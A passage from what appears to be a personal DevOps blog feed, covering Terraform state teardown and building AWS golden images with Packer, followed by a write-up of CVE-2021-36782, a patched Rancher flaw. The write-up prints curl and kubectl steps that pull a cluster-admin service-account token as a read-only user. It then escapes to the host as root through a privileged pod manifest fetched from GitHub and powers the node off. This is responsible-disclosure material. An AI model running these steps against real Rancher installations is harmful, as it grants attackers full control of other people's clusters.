  backend? Enter &quot;yes&quot; to copy and &quot;no&quot; to start with an empty state.

  Enter a value: yes



Successfully unset the backend &quot;s3&quot;. Terraform will now operate locally.
Initializing modules...

Initializing provider plugins...
- Reusing previous version of hashicorp/random from the dependency lock file
- Reusing previous version of hashicorp/local from the dependency lock file
- Reusing previous version of hashicorp/aws from the dependency lock file
- Using previously-installed hashicorp/aws v4.37.0
- Using previously-installed hashicorp/random v3.6.0
- Using previously-installed hashicorp/local v2.2.2

Terraform has been successfully initialized!

You may now begin working with Terraform. Try running &quot;terraform plan&quot; to see
any changes that are required for your infrastructure. All Terraform commands
should now work.

If you ever set or change modules or backend configuration for Terraform,
rerun this command to reinitialize your working directory. If you forget, other
commands will detect it and remind you to do so if necessary.</code></pre><figcaption><p><span style="white-space: pre-wrap;">Terraform migrate</span></p></figcaption></figure><p>When the state is back to your local machine. Just destroy everything using <code>terraform destroy</code> and everything will be completely removed.</p><h2 id="conclusion">Conclusion</h2><p>I think using GitHub as a place to manage anything and everything that&apos;s in your account is the only way to go. Clickopsing results in rogue resources that cannot be managed.</p><p>Whenever I have clickopsed things in a testing account, I use the <a href="https://github.com/rebuy-de/aws-nuke">aws-nuke</a> script to find and remove all leftover AWS resources.</p><p>Further enhancements could be added to this setup, like making sure that the <code>plan</code> job only has read-only access, and the <code>apply</code> job with read-write access can only be run from the main branch.</p><h2 id="versions-used">Versions used</h2><pre><code class="language-plaintext">Terraform 1.7.0</code></pre>]]></content:encoded></item><item><title><![CDATA[Creating a golden image with Packer]]></title><description><![CDATA[Using Packer to generate a golden image for a dev environment on AWS. How to use Packer and create an IAM role and policy for it using Terraform.]]></description><link>https://fe.ax/packer-golden-image/</link><guid isPermaLink="false">63e5585958220f005de16142</guid><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Wed, 08 Mar 2023 22:00:49 GMT</pubDate><content:encoded><![CDATA[<p><a href="https://www.packer.io/">Packer</a> is a tool to automate the build process for machine images. I&apos;ve started looking into Packer to generate a <a href="https://www.redhat.com/en/topics/linux/what-is-a-golden-image">golden image</a>. Using a golden image lets me quickly set up a fresh development environment without keeping the EC2 instance for long periods and thinking about configuration drift. Fixing an issue can be as easy as recreating the EC2 instance. Besides that, sharing your environment with others and experimenting with different setups is made easy.</p><p>The GitHub repo for this blog article can be found <a href="https://github.com/fe-ax/packer-blog">here</a>.</p><h2 id="getting-started">Getting started</h2><p>Building machine images for AWS can be a time-consuming and error-prone process, but with Packer, you can automate the entire process. Packer is a powerful tool that allows you to create golden images for your development environment with just a few simple steps:</p><ol><li>Booting an existing AMI image</li><li>Running some commands over SSH</li><li>Shutting it down</li><li>Taking a snapshot</li><li>Creating an AMI from the snapshot</li><li>Cleaning up</li></ol><p>It&apos;s that simple, but Packer will automate these simple tasks. You can also use Packer to build against multiple platforms and architectures, which can be helpful when running on AWS Graviton instances like the <a href="https://aws.amazon.com/ec2/instance-types/t4/">t4g</a> and x86 like <a href="https://aws.amazon.com/ec2/instance-types/t3/">t3</a> or <a href="https://aws.amazon.com/ec2/instance-types/t3/">t3a</a>.</p><p>I&apos;ve gone to some lengths to create a separate role for Packer in AWS IAM. You can easily strip it out if you want to use your all-mighty admin user.</p><h3 id="installing-packer">Installing Packer</h3><p>As usual, with modern commercial tools, the <a href="https://developer.hashicorp.com/packer/downloads">installation is straightforward</a>.</p><pre><code class="language-bash">wget -O- https://apt.releases.hashicorp.com/gpg | gpg --dearmor | sudo tee /usr/share/keyrings/hashicorp-archive-keyring.gpg
echo &quot;deb [signed-by=/usr/share/keyrings/hashicorp-archive-keyring.gpg] https://apt.releases.hashicorp.com $(lsb_release -cs) main&quot; | sudo tee /etc/apt/sources.list.d/hashicorp.list
sudo apt update &amp;&amp; sudo apt install packer</code></pre><p>You can test Packer by running the following: <code>packer version</code></p><h3 id="iam-policy-and-role-for-packer-in-aws">IAM policy and role for Packer in AWS</h3><p>If you don&apos;t want to create IAM policies and choose to use your own AWS account, you can skip this path. Using an IAM role is particularly effective when Packer runs from an EC2 instance. I used an IAM role rather than our admin user for security reasons. If we run Packer from our local machine, it will assume the IAM role we&apos;ve created, which has limited permissions. This reduces the risk of accidental exposure of our AWS credentials.</p><p>While using an IAM group might seem more straightforward, it has some drawbacks. We&apos;ll need an IAM role if we eventually want to use EC2 to build EC2 images. Additionally, using an IAM role is more secure, as it allows us to limit the permissions of Packer to only what it needs. Packer also provides a <a href="https://developer.hashicorp.com/packer/plugins/builders/amazon/chroot">chroot builder</a>, which uses a continuously running machine. It should be faster and able to leverage the IAM role we&apos;re creating. This is out of the scope of this blog post, however.</p><p>We can find the needed IAM policy <a href="https://developer.hashicorp.com/packer/plugins/builders/amazon#iam-task-or-instance-role">here</a>. It gives a lot of privileges. I&apos;ve read <a href="https://blog.stefan-koch.name/2021/05/16/restricted-packer-aws-permissions">this article</a> by <em>Stefan Koch</em> about reducing the privileges required but did not implement it here. Not implementing Stefan&apos;s way is quicker but breaks the least privileges principle. Imagine a pipeline running with these privileges and accidentally exposing its credentials. It&apos;s okay for development but not for production. Also, consider dedicating a specific AWS account to building AMIs if you have many of them.</p><h3 id="using-terraform-to-create-iam-resources">Using Terraform to create IAM resources</h3><p>We can easily manage and clean up the privileges handed out by leveraging infrastructure as code to create IAM resources. It also allows us to collaborate with others by using git, giving us version control. You can find the resulting Terraform config in my <a href="https://github.com/fe-ax/packer-blog">GitHub repository</a>.</p><p>To gain the privileges needed to build images with Packer, we need a couple of Terraform IAM resources:</p><figure class="kg-card kg-image-card kg-card-hascaption"><a href="https://fe.ax/content/images/size/w1000/2023/01/download--3--1.png"><img src="https://fe.ax/content/images/2023/03/chrome_2023-03-12_20-06-55.png" class="kg-image" alt loading="lazy" width="2000" height="674" srcset="https://fe.ax/content/images/size/w600/2023/03/chrome_2023-03-12_20-06-55.png 600w, https://fe.ax/content/images/size/w1000/2023/03/chrome_2023-03-12_20-06-55.png 1000w, https://fe.ax/content/images/size/w1600/2023/03/chrome_2023-03-12_20-06-55.png 1600w, https://fe.ax/content/images/size/w2400/2023/03/chrome_2023-03-12_20-06-55.png 2400w" sizes="(min-width: 720px) 720px"></a><figcaption><span style="white-space: pre-wrap;">Dependency tree based on </span><a href="https://github.com/pcasteran/terraform-graph-beautifier/tree/master"><span style="white-space: pre-wrap;">Terraform graph beautifier</span></a></figcaption></figure><p>According to <a href="https://registry.terraform.io/providers/hashicorp/aws/2.33.0/docs/guides/iam-policy-documents">Terraform</a>:</p><blockquote>The recommended approach to building AWS IAM policy documents within Terraform is the highly customizable <a href="https://registry.terraform.io/providers/hashicorp/aws/2.33.0/docs/guides/iam-policy-documents#aws_iam_policy_document-data-source"><code>aws_iam_policy_document</code> data source</a>.</blockquote><p>That is a lot of resource blocks for just one IAM role. I created my current IAM policies by hand while playing with them, but now I have to clean them up.</p><blockquote>To confirm deletion, enter the policy name in the text input field.</blockquote><p>After cleaning up, I ran the Terraform module creating the visualized resources above. It also writes a file named: <code>packer.pkrvar.hcl</code>. I now have a <em>packer</em> user that can create AMIs for me. Controlled and managed by a Terraform config, written as code.</p><h3 id="preparing-and-validating-packer">Preparing and validating Packer</h3><p>We can now create the Packer build file. I called it <code>aws-k3s.pkr.hcl</code>, and you can find it in the <a href="https://github.com/fe-ax/packer-blog">GitHub repository</a>.</p><p>The variables are read from the file Terraform just created (<code>packer.pkrvar.hcl</code>). If you skipped that part, you need to fill it in yourself like this:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">packer_access_key = &quot;my-access-key&quot;
packer_secret_key = &quot;my-secret-key&quot;
packer_region     = &quot;eu-central-1&quot;
packer_role_arn   = &quot;arn:aws:iam::123456789012:role/packer_role&quot;
</code></pre><figcaption><p><span style="white-space: pre-wrap;">packer.pkrvar.hcl</span></p></figcaption></figure><p>The main Packer file refers to these variables in the <code>source &quot;amazon-ebs&quot; &quot;ubuntu&quot;</code> resource. This resource selects one of the builders, which can be found under the <a href="https://developer.hashicorp.com/packer/plugins">plugins section of the documentation</a>. We&apos;re using the Amazon EC2 EBS builder for now.</p><h3 id="preparing-images-with-provisioners">Preparing images with provisioners</h3><p>Most of the Packer setups use the <a href="https://developer.hashicorp.com/packer/docs/provisioners/shell">Shell provisioner</a>. This way, Packer runs a script on the template source machine over SSH, which differs from the cloud-init we&apos;ll later use to initialize an instance running this image.</p><p>For Ubuntu, it&apos;s essential to include the first line:</p><pre><code class="language-bash">cloud-init status --wait</code></pre><p>If you don&apos;t wait for it to finish, some files still being created during the post-first boot script runs will not be available, and things like APT can thus show issues. More about this <a href="https://developer.hashicorp.com/packer/docs/debugging#issues-installing-ubuntu-packages">here</a>.</p><p>The current configuration only tests the build since the variable <code>skip_create_ami</code> is set to true. This is an important setting when testing, as it doesn&apos;t create an actual AMI after it&apos;s done. You can immediately set the variable <code>skip_create_ami</code> to false if you&apos;re not changing the provisioner.</p><p>You can check the Packer config by running the following:</p><pre><code class="language-bash">marco@DESKTOP:~/ebpf-xdp-dev/packer$ packer validate -var-file=packer.pkrvar.hcl aws-k3s.pkr.hcl 
The configuration is valid.
marco@DESKTOP:~/ebpf-xdp-dev/packer$ packer build -var-file=packer.pkrvar.hcl aws-k3s.pkr.hcl 
k3s.amazon-ebs.ubuntu: output will be in this color.

==&gt; k3s.amazon-ebs.ubuntu: Prevalidating any provided VPC information
==&gt; k3s.amazon-ebs.ubuntu: Prevalidating AMI Name: ebpf-xdp-dev-2023-01-30-17-54-28
    k3s.amazon-ebs.ubuntu: Found Image ID: ami-12a3456c325f02ab
==&gt; k3s.amazon-ebs.ubuntu: Creating temporary keypair: packer_12r18272-21d6-f24f-fb33-bc4e2f50e00a
==&gt; k3s.amazon-ebs.ubuntu: Creating temporary security group for this instance: packer_9217wegf9e-b58b-4acc-d18e-2b19ad93bc96
==&gt; k3s.amazon-ebs.ubuntu: Authorizing access to port 22 from [0.0.0.0/0] in the temporary security groups...
==&gt; k3s.amazon-ebs.ubuntu: Launching a source AWS instance...
    k3s.amazon-ebs.ubuntu: Adding tag: &quot;Creator&quot;: &quot;Packer&quot;
    k3s.amazon-ebs.ubuntu: Adding tag: &quot;Creator&quot;: &quot;Packer&quot;
    k3s.amazon-ebs.ubuntu: Instance ID: i-04db1b92a25d2ede6</code></pre><p>You can change the variable <code>skip_create_ami</code> to true if everything is correct and rerun it. This will do an entire run. The longest time will be spent in the snapshotting phase, as can be seen in a timetable here:</p><figure class="kg-card kg-code-card"><pre><code class="language-plaintext">00:00-00:00 - Prevalidation
00:00-00:01 - Creating keypair &amp; security group
00:01-00:02 - Launching a source AWS instance
00:02-00:27 - Connected to SSH and running provisioning script
00:27-01:37 - Stopping the source instance
01:37-08:56 - Creating AMI (creating snapshot is included in this step)
08:56-09:13 - Cleaning up</code></pre><figcaption><p><span style="white-space: pre-wrap;">Timetable for Packer run</span></p></figcaption></figure><p>As you can see, almost 80% of the time is spent waiting on AWS for the AMI to become ready. This is why it&apos;s recommended to use the <code>skip_create_ami</code> variable. Fast iterations of testing are necessary to reach your goal quickly, and with the chroot builder, the iterations could be even quicker.</p><h3 id="costs">Costs</h3><p>Just like when stopping an EC2 instance, you have to pay a fee for saving EBS snapshots. This snapshot has to exist as long as you&apos;re holding on to that AMI. The costs for this are approximately <a href="https://aws.amazon.com/ebs/pricing/">$0.05 per GB per month</a>.</p><blockquote>For my single image of 8GB, I&apos;ll pay $0.62 per 31-day month.</blockquote><p>Remember to <a href="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ami-deprecate.html">set up AMI deprecation</a> and deregistration if you&apos;re creating images on a schedule. $0.62 isn&apos;t much, but run this daily, and you&apos;ll pay $19.22 after a month.</p><p>This is just a little cheaper than holding on to a stopped EC2&apos;s EBS volume at $0.0952. However, that EC2 volume might be three to four times larger than the image we&apos;ve created to prevent disk space issues while running.</p><p>Especially when using EBS type io2 instead of gp3, it can be much cheaper to throw the volume away and recreate it when needed, for example, during the auto-scaling of EC2 instances.</p><h3 id="final-thoughts-on-packer">Final thoughts on Packer</h3><p>After exploring Packer and the golden image principle, I am convinced this workflow is a valuable addition to my toolkit.</p><p>Using Packer and AMIs can help maintain consistency and improve collaboration in a project, especially when multiple team members are involved.</p><p>Another advantage of Packer and AMIs is the ability to quickly restore an instance to its original state in case of issues.</p><p>However, it&apos;s worth noting that starting an EC2 instance from scratch using an AMI can take longer than just starting an instance. In some cases, it may be more efficient to simply start and stop instances. Using a combination of both will give you the best of both worlds.</p>]]></content:encoded></item><item><title><![CDATA[Write-up of CVE-2021-36782: Exposure of credentials in Rancher API]]></title><description><![CDATA[A write-up of CVE-2021-36782. This vulnerability exposes Rancher's kontainer-engine's ServiceAccountToken, which can be used for privilege escalation.]]></description><link>https://fe.ax/cve-2021-36782/</link><guid isPermaLink="false">6353f02e07faa6007908d294</guid><category><![CDATA[Rancher]]></category><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Wed, 14 Dec 2022 12:45:34 GMT</pubDate><content:encoded><![CDATA[<p>It has been a while since the last post on my blog. In April, I found an issue in the <a href="https://github.com/rancher/rancher">Rancher</a> software, which is used to provision and manage Kubernetes clusters. We&apos;re four months past a published patched version, and I wanted to do a little write-up. It&apos;s not advisable to follow along using a production cluster. I&apos;ve put an easy way to launch a Rancher cluster with Terraform at the bottom to follow along.</p><h2 id="summary">Summary</h2><p>The issue caused an important Kubernetes <a href="https://kubernetes.io/docs/reference/access-authn-authz/authentication/#service-account-tokens">ServiceAccountToken</a>, to be exposed to low-privileged users. The exposed token can access downstream clusters as admin. The vulnerability is considered critical and has received a 9.9 CVSS score, and they published it under <a href="https://github.com/rancher/rancher/security/advisories/GHSA-g7j7-h4q8-8w2f">this security advisory</a>. On 7 April 2022, I sent a responsible disclosure of this issue, including a proof of concept, to Rancher. A quick confirmation of receipt was sent back 45 minutes later, and about 13 hours later, they sent confirmation of the issue and started working on a fix, which was very quick.</p><blockquote><em>Hi Marco.<br><br>Thank you once again for reporting this issue directly to us and for the excellent PoC. This helped us to quickly evaluate and confirm the issue, which affects Rancher versions 2.6.4 and 2.5.12.<br><br>We started working on a fix and will release in the upcoming versions of Rancher. It will not be publicly announced until all supported Rancher versions are patched. We will communicate to you in advance before we release the latest fixed version.<br><br>Please let us know if you have any questions.<br><br>Thanks,</em></blockquote><p>Rancher kept me up to date as time passed about the fix they were working on. On 19 August 2022, Rancher released a patched version, version 2.6.7.</p><p>In this blog article, I want to explain the vulnerability the best I can while providing a way to follow along.</p><h2 id="the-service-account">The service account</h2><p>Rancher uses Kubernetes service accounts to access other clusters. There are two relevant service accounts I want to talk about.</p><p>The first one is the Rancher user&apos;s token. A user created in Rancher gets a service account bound to specific roles granted on a particular cluster. Because it&apos;s bound to specific roles, it has limited privileges to what it can do.</p><p>For demonstration, I&apos;ve created a user named &quot;readonlyuser&quot;, and this is what it can do:</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://fe.ax/content/images/2022/11/image-2.png" class="kg-image" alt loading="lazy" width="743" height="318" srcset="https://fe.ax/content/images/size/w600/2022/11/image-2.png 600w, https://fe.ax/content/images/2022/11/image-2.png 743w"><figcaption><span style="white-space: pre-wrap;">kubectl auth can-i --list</span></figcaption></figure><p>This user has access to Rancher&apos;s predefined role <em>&quot;view workloads&quot; </em>in the project <em>&quot;extraproject&quot;. </em>Only one namespace is currently bound to this project, called <em>&quot;foo&quot;</em>, meaning the user has almost no access and, therefore, doesn&apos;t see many objects in the Rancher dashboard.</p><p>This user uses his service account token to gain this access. Since a Rancher user normally would proxy API calls through Rancher&apos;s <em>cluster router</em>, the user doesn&apos;t see this service account token. When you download the kubeconfig file from the UI, you do see this token.</p><p>Rancher also uses a service account token for its <a href="https://github.com/rancher/rancher/tree/release/v2.7/pkg/kontainer-engine">kontainer-engine</a> to manage the downstream clusters and gets this token from the API, as can be seen here:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/rancher/rancher/blob/9b2f2ae0e0d89f16580cd7767a52a6d9b5230fda/pkg/clustermanager/manager.go#L173"><div class="kg-bookmark-content"><div class="kg-bookmark-title">rancher/manager.go at 9b2f2ae0e0d89f16580cd7767a52a6d9b5230fda &#xB7; rancher/rancher</div><div class="kg-bookmark-description">Complete container management platform. Contribute to rancher/rancher development by creating an account on GitHub.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">rancher</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/83c09ad19f41c4ad1af141e19e23c8199a92a105f3ce95759a4d4174f83226e7/rancher/rancher" alt></div></a></figure><p>This service account is just like the user&apos;s service account but is bound to the <em>cluster-admin</em> role and shouldn&apos;t be available to regular users.</p><h2 id="accessing-ranchers-service-account-token">Accessing Rancher&apos;s service account token</h2><p>Rancher renders things using javascript and API calls from the browser. This is visible when you log into the Rancher dashboard and open the developer console. They&apos;ve written dynamically generated forms and lists based on schemas. For example, Rancher has a view for <em>workloads,</em> and when you open it, it&apos;ll call the Kubernetes API for data to populate the view with the returned data.</p><p>One of the used API calls is <code>/v1/management.cattle.io.cluster</code> for information about the clusters the user can see. You can investigate this by opening the API path in the browser or immediately requesting the information using curl.</p><pre><code class="language-bash">BASEURL=&quot;https://rancher.1...4.sslip.io&quot;

# Request UI token, or create API token manually
TOKEN=$(curl -s -k -XPOST \
  -d &apos;{&quot;description&quot;:&quot;UI session&quot;,\
  &quot;responseType&quot;:&quot;token&quot;, \
  &quot;username&quot;:&quot;readonlyuser&quot;, \
  &quot;password&quot;:&quot;readonlyuserreadonlyuser&quot;}&apos; \
  ${BASEURL}/v3-public/localProviders/local?action=login \
  | jq &apos;.token&apos; -r)

curl -s -k -XGET \
  -H &quot;Authorization: Bearer $TOKEN&quot; \
  ${BASEURL}/v1/management.cattle.io.clusters \
  | jq &apos;.data[] | select(.spec.displayName==&quot;extra-cluster&quot;) | .status&apos;</code></pre><p>The service account token you receive in the <code>status.serviceAccountToken</code> field of this object is not the user&apos;s token but the kontainer-engine&apos;s token. If we decode the JWT token, we see <a href="https://jwt.io/#debugger-io?token=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNkZ2h2QkxHMUR5cVIyV1BUYlNaMUFEcDg5UmNBQ3lxYlRhOWpwNGhHckEifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJjYXR0bGUtc3lzdGVtIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImtvbnRhaW5lci1lbmdpbmUtdG9rZW4tdHBqc3IiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoia29udGFpbmVyLWVuZ2luZSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjIzMmU1MjE4LTkyNDgtNDEyOS04OGUwLTRmZjlkOTk2OTI3MSIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjYXR0bGUtc3lzdGVtOmtvbnRhaW5lci1lbmdpbmUifQ.C57WQ-tzUBce3R1Dfs7KU3KueTLor_D4MqAsQIwp9udxjORin-zmFCJXHyTysQI8d1ocisSnJE-ZNb-PvjzixGzDIvZcjA0a2YvFqA4Tmc5yyC4VzM_nZgrY8M5yBxTTdIZNoka9qCdpdavL9U4UuYvGDS5HXQ4_K-eSGb95VoIgzH355acjZEN6yv_d4fXyoqIYahAiwmlnWvFALQOqOoCzYrmHst-HoFI1AmXE_N4PZRVYaOoAlBia0Q2Fcl808arx9iGqi7UdKjfhqurb5-Aws8XNxrrMZoOCJYPu40NEjkX5yr517oCxk1I2frfUeO5jTxhexyqImzoOcl4TYA">this is the result</a>.</p><figure class="kg-card kg-code-card"><pre><code class="language-json">{
  &quot;iss&quot;: &quot;kubernetes/serviceaccount&quot;,
  &quot;kubernetes.io/serviceaccount/namespace&quot;: &quot;cattle-system&quot;,
  &quot;kubernetes.io/serviceaccount/secret.name&quot;: &quot;kontainer-engine-token-tpjsr&quot;,
  &quot;kubernetes.io/serviceaccount/service-account.name&quot;: &quot;kontainer-engine&quot;,
  &quot;kubernetes.io/serviceaccount/service-account.uid&quot;: &quot;232e5218-9248-4129-88e0-4ff9d9969271&quot;,
  &quot;sub&quot;: &quot;system:serviceaccount:cattle-system:kontainer-engine&quot;
}</code></pre><figcaption><p><span style="white-space: pre-wrap;">Decoded JWT token</span></p></figcaption></figure><p>This shows that the subject of this token is <em>kontainer-engine,</em> and it lives in the <em>cattle-system</em> namespace.</p><h2 id="using-the-jwt-token">Using the JWT token</h2><p>To use this JWT token, we need direct network access to the cluster&apos;s kube-api, as the Rancher proxy will not recognize the token. We can find the Kubernetes API endpoint from the browser or use the same API with curl.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">BASEURL=&quot;https://rancher.1...4.sslip.io&quot;

# Request UI token, or create API token manually
TOKEN=$(curl -s -k -XPOST \
  -d &apos;{&quot;description&quot;:&quot;UI session&quot;,\
  &quot;responseType&quot;:&quot;token&quot;, \
  &quot;username&quot;:&quot;readonlyuser&quot;, \
  &quot;password&quot;:&quot;readonlyuserreadonlyuser&quot;}&apos; \
  ${BASEURL}/v3-public/localProviders/local?action=login \
  | jq &apos;.token&apos; -r)

# Fetch API endpoint downstream cluster
curl -s -k -XGET \
  -H &quot;Authorization: Bearer $TOKEN&quot; \
  ${BASEURL}/v1/management.cattle.io.clusters \
  | jq &apos;.data[] | select(.spec.displayName==&quot;extra-cluster2&quot;) | .status.apiEndpoint&apos; -r
  
# Example response: https://1...2:6443</code></pre><figcaption><p><span style="white-space: pre-wrap;">Fetching the downstream Kubernetes API endpoint</span></p></figcaption></figure><p>The endpoint is different from the base URL and should end in port 6443. If the downstream cluster is protected from direct accessing, you need to continue from the Rancher-provided shell in the top-right corner of the UI. Note that you&apos;ll need to <a href="https://github.com/moparisthebest/static-curl/releases/latest">download a precompiled version of curl</a>.</p><p>You can continue using curl calls or set up kubectl to access the cluster. I will do the first call using curl, then set up kubectl to show both ways.</p><p>When requesting the ClusterRoleBindings for <em>system:serviceaccount:cattle-system:kontainer-engine</em>, we see that this service account is bound to the <em>cluster-admin</em> ClusterRole.</p><figure class="kg-card kg-code-card"><pre><code class="language-bash">TOKEN=&quot;eyJhbGciOiJSUzI1NiIsImtpZCI6IlNkZ2h2QkxHMUR5cVIyV1BUYlNaMUFEcDg5UmNBQ3lxYlRhOWpwNGhHckEifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJjYXR0bGUtc3lzdGVtIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImtvbnRhaW5lci1lbmdpbmUtdG9rZW4tdHBqc3IiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoia29udGFpbmVyLWVuZ2luZSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjIzMmU1MjE4LTkyNDgtNDEyOS04OGUwLTRmZjlkOTk2OTI3MSIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjYXR0bGUtc3lzdGVtOmtvbnRhaW5lci1lbmdpbmUifQ.C57WQ-tzUBce3R1Dfs7KU3KueTLor_D4MqAsQIwp9udxjORin-zmFCJXHyTysQI8d1ocisSnJE-ZNb-PvjzixGzDIvZcjA0a2YvFqA4Tmc5yyC4VzM_nZgrY8M5yBxTTdIZNoka9qCdpdavL9U4UuYvGDS5HXQ4_K-eSGb95VoIgzH355acjZEN6yv_d4fXyoqIYahAiwmlnWvFALQOqOoCzYrmHst-HoFI1AmXE_N4PZRVYaOoAlBia0Q2Fcl808arx9iGqi7UdKjfhqurb5-Aws8XNxrrMZoOCJYPu40NEjkX5yr517oCxk1I2frfUeO5jTxhexyqImzoOcl4TYA&quot;

curl -s -k -X GET  -H &quot;Authorization: Bearer $TOKEN&quot; \
  https://--:6443/apis/rbac.authorization.k8s.io/v1/clusterrolebindings \
  | jq &apos;.items[] | select(.subjects[].name==&quot;kontainer-engine&quot;)&apos;
{
  &quot;metadata&quot;: {
    &quot;name&quot;: &quot;system-netes-default-clusterRoleBinding&quot;,
    &quot;uid&quot;: &quot;cb0a6201-6c70-4186-ac82-97761169859a&quot;,
    &quot;resourceVersion&quot;: &quot;803&quot;,
    &quot;creationTimestamp&quot;: &quot;2022-11-24T20:21:08Z&quot;,
    &quot;managedFields&quot;: [
      {
        &quot;manager&quot;: &quot;Go-http-client&quot;,
        &quot;operation&quot;: &quot;Update&quot;,
        &quot;apiVersion&quot;: &quot;rbac.authorization.k8s.io/v1&quot;,
        &quot;time&quot;: &quot;2022-11-24T20:21:08Z&quot;,
        &quot;fieldsType&quot;: &quot;FieldsV1&quot;,
        &quot;fieldsV1&quot;: {
          &quot;f:roleRef&quot;: {},
          &quot;f:subjects&quot;: {}
        }
      }
    ]
  },
  &quot;subjects&quot;: [
    {
      &quot;kind&quot;: &quot;ServiceAccount&quot;,
      &quot;name&quot;: &quot;kontainer-engine&quot;,
      &quot;namespace&quot;: &quot;cattle-system&quot;
    }
  ],
  &quot;roleRef&quot;: {
    &quot;apiGroup&quot;: &quot;rbac.authorization.k8s.io&quot;,
    &quot;kind&quot;: &quot;ClusterRole&quot;,
    &quot;name&quot;: &quot;cluster-admin&quot;
  }
}</code></pre><figcaption><p><span style="white-space: pre-wrap;">Accessing the cluster role bindings with the kontainer-engine&apos;s JWT token</span></p></figcaption></figure><p>Service accounts bound to the <a href="https://kubernetes.io/docs/reference/access-authn-authz/rbac/#:~:text=Description-,cluster%2Dadmin,-system%3Amasters%20group">cluster-admin</a> cluster role have super-user access to the Kubernetes cluster. Therefore we can do anything to the cluster we want using this token. Let&apos;s put this in a kubeconfig file.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell"># The JWT token
token=eyJhbGciOiJSUzI1NiIsImtpZCI6IklvbXVOckJ1eFZrRVNZUDNXRnlndWNSbFpzRndIWjlKQnJkOFdDUG5ybFEifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJjYXR0bGUtc3lzdGVtIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImtvbnRhaW5lci1lbmdpbmUtdG9rZW4tcTY0eDUiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoia29udGFpbmVyLWVuZ2luZSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6ImNjM2QyNGVjLWI0MjItNGJmYy04M2U0LWE5ODJmOTRlYjJhOSIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjYXR0bGUtc3lzdGVtOmtvbnRhaW5lci1lbmdpbmUifQ.ApVZZ9EEo7bqUeEpHdVqEklWL8GPN4fVfRwH0LtTm6lRsrQFnYVpus2VrjyeqoVTnrzEetsYZyWEiv0KODw3HYgePW_XbrrCqKSi3Aca6-sA5sJP28A4QWkUVH_6y-6nS53w24pdk77l-4YxXLIYTUilipe9JaXpzBrER5OsCNjweNILfmC5LHlRAtpvNVh7vahZsAxcDdDBzwpWuKubDz_3yRiHNH8nC-x40SJz90Xi771w7Aw7qvAvodX-5efVFHuzNw0Q4Qjcpj6RcV2I-rKGy5ORYgrXcNrXgPWZSpO8MU8iupS5XpW2SH9pgQI6Xe2QuyySia6I71ZkagsYWw

# Use a different kubeconfig file
export KUBECONFIG=~/kubeconfig-extra-cluster2

kubectl config set-cluster extra-cluster2 \
   --server=https://1...2:6443 \
   --insecure-skip-tls-verify=true

kubectl config set-credentials extra-cluster2-admin \
   --token=$token

kubectl config set-context extra-cluster2 \
   --user=extra-cluster2-admin \
   --cluster=extra-cluster2

kubectl config use-context extra-cluster2

kubectl auth can-i --list</code></pre><figcaption><p><span style="white-space: pre-wrap;">Configuring the kubectl config</span></p></figcaption></figure><p>Running the above commands shows the following output.</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://fe.ax/content/images/2022/11/image-5.png" class="kg-image" alt loading="lazy" width="888" height="366" srcset="https://fe.ax/content/images/size/w600/2022/11/image-5.png 600w, https://fe.ax/content/images/2022/11/image-5.png 888w"><figcaption><span style="white-space: pre-wrap;">kubectl auth can-i --list</span></figcaption></figure><p>Which essentially means unrestricted access. As an extra, let&apos;s gain access to the host and power it off, as we don&apos;t need this cluster anymore anyway.</p><figure class="kg-card kg-code-card"><pre><code class="language-plaintext">kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml

&gt; pod/everything-allowed-exec-pod created

kubectl exec -it everything-allowed-exec-pod -- chroot /host bash

&gt; root@marco-test-extra-node3:/# id
&gt; uid=0(root) gid=0(root) groups=0(root)
&gt; root@marco-test-extra-node3:/# poweroff

